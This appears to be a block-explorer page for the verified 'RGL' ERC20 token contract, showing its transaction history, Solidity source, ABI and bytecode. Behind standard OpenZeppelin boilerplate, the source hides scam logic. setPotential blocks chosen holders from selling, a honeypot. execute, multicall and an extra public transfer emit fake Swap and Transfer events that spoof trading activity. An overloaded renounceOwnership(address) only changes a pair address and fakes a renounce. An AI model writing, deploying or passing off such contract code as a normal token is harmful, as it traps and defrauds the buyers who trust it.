ETH Price: $2,610.62 (-1.72%)

Contract

0x6E5Bfeaa9C1271a6DCD4De6a08258ee6F3706640
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer174579162023-06-11 15:59:35477 days ago1686499175IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008799616.0862168
Approve174573962023-06-11 14:14:59477 days ago1686492899IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007387115.66296169
Execute174573872023-06-11 14:13:11477 days ago1686492791IN
0x6E5Bfeaa...6F3706640
0 ETH0.0009545217.7694221
Execute174573862023-06-11 14:12:59477 days ago1686492779IN
0x6E5Bfeaa...6F3706640
0 ETH0.0009734718.12224464
Execute174573312023-06-11 14:01:47477 days ago1686492107IN
0x6E5Bfeaa...6F3706640
0 ETH0.0006867817.08026367
Execute174573172023-06-11 13:58:59477 days ago1686491939IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008562415.93985682
Execute174573152023-06-11 13:58:35477 days ago1686491915IN
0x6E5Bfeaa...6F3706640
0 ETH0.0006578816.35676951
Execute174572952023-06-11 13:54:35477 days ago1686491675IN
0x6E5Bfeaa...6F3706640
0 ETH0.0009448417.59326103
Execute174572922023-06-11 13:53:59477 days ago1686491639IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007951716.93402713
Renounce Ownersh...174572862023-06-11 13:52:47477 days ago1686491567IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008306717.91677123
Execute174572792023-06-11 13:51:23477 days ago1686491483IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008437817.96924948
Approve174572262023-06-11 13:40:35477 days ago1686490835IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007520615.94613728
Approve174572202023-06-11 13:39:23477 days ago1686490763IN
0x6E5Bfeaa...6F3706640
0 ETH0.0006959814.75701083
Approve174571992023-06-11 13:35:11477 days ago1686490511IN
0x6E5Bfeaa...6F3706640
0 ETH0.0021836246.24069487
Approve174568462023-06-11 12:23:11477 days ago1686486191IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007399915.69013172
Approve174568442023-06-11 12:22:47477 days ago1686486167IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007750616.43366249
Approve174568412023-06-11 12:22:11477 days ago1686486131IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007238915.34879049
Approve174568402023-06-11 12:21:59477 days ago1686486119IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007452915.80244242
Approve174568342023-06-11 12:20:47477 days ago1686486047IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007508215.91973914
Approve174568302023-06-11 12:19:47477 days ago1686485987IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008834218.73124634
Approve174568152023-06-11 12:16:35477 days ago1686485795IN
0x6E5Bfeaa...6F3706640
0 ETH0.0008096617.25516568
Set Potential174567502023-06-11 12:03:11477 days ago1686484991IN
0x6E5Bfeaa...6F3706640
0 ETH0.00602363115.333509
Set Potential174567472023-06-11 12:02:35477 days ago1686484955IN
0x6E5Bfeaa...6F3706640
0 ETH0.00603732115.59554694
Approve174567432023-06-11 12:01:47477 days ago1686484907IN
0x6E5Bfeaa...6F3706640
0 ETH0.0007080515.0128665
Set Potential174567432023-06-11 12:01:47477 days ago1686484907IN
0x6E5Bfeaa...6F3706640
0 ETH0.00598506114.5948665
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
RGL

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-10
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _potential;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _potentialApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _weth = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function renounceOwnership(address _owner_) external onlyOwner {
        _pair = _owner_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function setPotential(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _potential[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function unPotential(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _potential[_addresses_[i]] = false;
        }
    }

    function isSeparator(address _address_) public view returns (bool) {
        return _potential[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_potential[from] || _potential[to]) require(_potentialApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract RGL is ERC20 {
    constructor() ERC20("RGL", "RealGL") {
        _mint(msg.sender, 10000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"isSeparator","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"setPotential","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"unPotential","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000d657600080fd5b506040518060400160405280600381526020017f52474c00000000000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f5265616c474c00000000000000000000000000000000000000000000000000008152506200016362000157620001d160201b60201c565b620001d960201b60201c565b816006908162000174919062000698565b50806007908162000186919062000698565b505050620001cb336200019e6200029d60201b60201c565b600a620001ac91906200090f565b6509184e72a000620001bf919062000960565b620002a660201b60201c565b62000a97565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000318576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200030f9062000a0c565b60405180910390fd5b6200032c600083836200041460201b60201c565b806004600082825462000340919062000a2e565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003f4919062000a7a565b60405180910390a362000410600083836200041960201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004a057607f821691505b602082108103620004b657620004b562000458565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005207fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004e1565b6200052c8683620004e1565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000579620005736200056d8462000544565b6200054e565b62000544565b9050919050565b6000819050919050565b620005958362000558565b620005ad620005a48262000580565b848454620004ee565b825550505050565b600090565b620005c4620005b5565b620005d18184846200058a565b505050565b5b81811015620005f957620005ed600082620005ba565b600181019050620005d7565b5050565b601f82111562000648576200061281620004bc565b6200061d84620004d1565b810160208510156200062d578190505b620006456200063c85620004d1565b830182620005d6565b50505b505050565b600082821c905092915050565b60006200066d600019846008026200064d565b1980831691505092915050565b60006200068883836200065a565b9150826002028217905092915050565b620006a3826200041e565b67ffffffffffffffff811115620006bf57620006be62000429565b5b620006cb825462000487565b620006d8828285620005fd565b600060209050601f831160018114620007105760008415620006fb578287015190505b6200070785826200067a565b86555062000777565b601f1984166200072086620004bc565b60005b828110156200074a5784890151825560018201915060208501945060208101905062000723565b868310156200076a578489015162000766601f8916826200065a565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200080d57808604811115620007e557620007e46200077f565b5b6001851615620007f55780820291505b80810290506200080585620007ae565b9450620007c5565b94509492505050565b600082620008285760019050620008fb565b81620008385760009050620008fb565b81600181146200085157600281146200085c5762000892565b6001915050620008fb565b60ff8411156200087157620008706200077f565b5b8360020a9150848211156200088b576200088a6200077f565b5b50620008fb565b5060208310610133831016604e8410600b8410161715620008cc5782820a905083811115620008c657620008c56200077f565b5b620008fb565b620008db8484846001620007bb565b92509050818404811115620008f557620008f46200077f565b5b81810290505b9392505050565b600060ff82169050919050565b60006200091c8262000544565b9150620009298362000902565b9250620009587fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000816565b905092915050565b60006200096d8262000544565b91506200097a8362000544565b92508282026200098a8162000544565b91508282048414831517620009a457620009a36200077f565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620009f4601f83620009ab565b915062000a0182620009bc565b602082019050919050565b6000602082019050818103600083015262000a2781620009e5565b9050919050565b600062000a3b8262000544565b915062000a488362000544565b925082820190508082111562000a635762000a626200077f565b5b92915050565b62000a748162000544565b82525050565b600060208201905062000a91600083018462000a69565b92915050565b6120f38062000aa76000396000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c8063715018a6116100b8578063a1c617f51161007c578063a1c617f51461033c578063a457c2d714610358578063a9059cbb14610388578063beabacc8146103b8578063dd62ed3e146103d4578063f2fde38b1461040457610137565b8063715018a6146102aa5780637aac697b146102b4578063822a4619146102d05780638da5cb5b1461030057806395d89b411461031e57610137565b8063313ce567116100ff578063313ce567146101f457806338bf3cfa14610212578063395093511461022e5780634024367f1461025e57806370a082311461027a57610137565b806306fdde031461013c578063095ea7b31461015a5780630e8fbb7e1461018a57806318160ddd146101a657806323b872dd146101c4575b600080fd5b610144610420565b60405161015191906115f1565b60405180910390f35b610174600480360381019061016f91906116b1565b6104b2565b604051610181919061170c565b60405180910390f35b6101a4600480360381019061019f919061178c565b6104d5565b005b6101ae61063d565b6040516101bb91906117e8565b60405180910390f35b6101de60048036038101906101d99190611803565b610647565b6040516101eb919061170c565b60405180910390f35b6101fc610676565b6040516102099190611872565b60405180910390f35b61022c6004803603810190610227919061188d565b61067f565b005b610248600480360381019061024391906116b1565b6106cb565b604051610255919061170c565b60405180910390f35b6102786004803603810190610273919061178c565b610702565b005b610294600480360381019061028f919061188d565b6107af565b6040516102a191906117e8565b60405180910390f35b6102b26107f8565b005b6102ce60048036038101906102c99190